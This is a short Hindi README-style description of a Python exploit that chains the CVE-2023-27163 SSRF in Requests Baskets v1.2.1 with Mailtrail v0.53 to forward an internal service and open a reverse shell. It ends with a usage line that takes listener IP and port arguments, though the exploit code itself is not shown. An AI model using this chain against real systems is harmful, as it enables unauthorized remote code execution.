
Python exploit जो Requests Baskets में CVE-2023-27163 SSRF को Mailtrail v0.53 के साथ चेन करके आंतरिक सेवाओं को फ़ॉरवर्ड करता है और रिवर्स शेल निष्पादित करता है।
निम्नलिखित एक्सप्लॉइट Requests Baskets v1.2.1 SSRF vulnerability का दुरुपयोग करके 127.0.0.1:80 पर चल रहे आंतरिक एप्लिकेशन को /pwned पर बाहरी एप्लिकेशन तक अग्रेषित करता है। एक बार Mailtrail v0.53 एप्लिकेशन अग्रेषित हो जाने के बाद यह उसके विरुद्ध एक रिवर्स शेल कमांड निष्पादित करेगा और कुछ सेकंड के भीतर उपयोगकर्ता को मशीन पर रिवर्स शेल प्राप्त हो जाना चाहिए।
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT